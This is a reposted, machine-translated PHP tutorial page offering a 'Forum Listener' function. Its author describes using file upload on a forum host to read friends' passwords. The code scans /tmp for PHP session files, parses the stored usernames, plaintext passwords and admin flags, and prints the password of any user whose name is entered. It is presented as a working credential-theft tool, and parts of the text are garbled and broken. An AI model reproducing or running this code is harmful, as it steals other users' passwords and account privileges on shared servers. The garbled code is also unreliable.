Home  >  Article  >  Backend Development  >  A function to view session content:_PHP tutorial

A function to view session content:_PHP tutorial

WBOY
WBOYOriginal
2016-07-20 11:05:12822browse

The reason why this function can be written is mainly because the session structure of the website is clear, such as: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1" , also know the location where the session is stored, and can upload files, so I did a little hacking at that time, and the passwords of online friends can be seen at a glance, haha:
function submit1( ){
global $username;
print "Forum Listener";
$i=0;
if($username=="tasm"|| $username=="Tasm")
{
print "Are you too shady? Are you checking me too?";
return;
}
$path="/tmp /";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)==" sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]==""".$ username."""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print " User pen name: ".$name[2]."
Use password: ".$passwd[2]."
Use mode:";
if($mode[1]==1 )
print "admin";
else
print "General user";
print"

Stealing from others Passwords are immoral, please do something about it
";
$i=1;
break;
}}}}
if(!$i)
print "User :".$username." Is it really online? If you are sure, Please do it again, don’t type more spaces! ";
$d->close();
}
function login(){
?>


< ;title>Forum Listener




Forum Listener



www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/445163.htmlTechArticleThe reason why this function can be written is mainly because the session structure of the website is clear, such as: name|s :4:tasm;passwd|s:6:111111;mode|s:1:1, we also know where the session is stored, and can...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn